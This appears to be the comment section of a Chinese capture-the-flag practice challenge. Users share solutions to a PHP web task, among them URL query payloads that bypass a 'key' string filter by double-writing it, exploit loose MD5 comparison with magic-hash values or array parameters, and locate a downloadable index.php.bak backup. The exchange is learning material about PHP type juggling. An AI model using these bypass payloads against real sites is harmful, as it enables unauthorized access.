评分(14)
解题动态
SurPLus007 攻破了该题 59分钟前
violet06 攻破了该题 2小时前
ADGuang 攻破了该题 3小时前
威吉UF 攻破了该题 3小时前
zz0607 攻破了该题 4小时前
IlIlIlIllll 攻破了该题 15小时前
yueleng 攻破了该题 16小时前
13109208726 攻破了该题 17小时前
wuyuyu 攻破了该题 18小时前
linxi789654 攻破了该题 18小时前
345634634 攻破了该题 20小时前
bkniu 攻破了该题 21小时前
你好世界0001 攻破了该题 22小时前
19103732562 攻破了该题 23小时前
15338676214 攻破了该题 1天前
xhonggcc 攻破了该题 1天前
xin_tian 攻破了该题 1天前
19064086149 攻破了该题 1天前
btfwufeng 攻破了该题 1天前
评论
20230302203 2月前
举报
其实在后面加这个就好了 /?kekeyy1=QNKCDZO&kekeyy2=s878926199a
x105 2月前
举报
http://117.72.52.127:16269/?kkeyey1=240610708&kkeyey2=QNKCDZO
ubudj 3月前
举报
有两个部分,一个是去除key,一个是md5的值相等,所以可以用kekeyy1= 240610708&kekeyy2=QNKCDZO
一个姓⎝李⎠的师傅~ 3月前
举报
https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc# 自己的解题思路,感兴趣的小伙伴可以一起交流学习~
zhenhui 3月前
举报
看这个地址/index.php.bak, 下载备份文件可以查看逻辑,然后可以输入/?kekeyy1[]=1&kekeyy2[]=2可以查看flag
solomom 3月前
举报
关键是双写key绕过,php代码审计还没过关,哭哭
zycc 4月前
举报
打开bak文件里面有一段代码:str_replace('key','',$str);所以如果在网页里输入key的话会被消除掉,所以要改为kkeyey或者kekeyy的样子
wywsssf 4月前
举报
dirsearch扫出.bak文件,加链接后访问直接可下载,分析下载的代码,两参数会被做如下操作:1、删除字母key;2、md5值弱比较得相同。用AI构造参数?kkeyey1=240610708&kkeyey2=QNKCDZO加在链接后
dlgz 4月前
举报
/index.php?kkeyey1[]=a&kkeyey2[]=0 /index.php?kkeyey1=240610708&kkeyey2=QNKCDZO /index.php?kkeyey1=s878926199a&kkeyey2=s155964671a
老兵烧烤 4月前
举报
地址栏直接输入: /?kkeyey1= 回车后可直接显示flag ;因为key1 是空字符串,key2 是NULL,PHP中严格比较时类型不同,所以不相等,但是MD5是一样的(通过使两个变量达到值不同但哈希相同的状态来满足条件)
一个姓⎝李⎠的师傅~ 3月前
举报
@17609420059 str_replace('key','',$str);
17609420059 4月前
举报
我咋知道他的变量是kkeyey1而不是key1呢?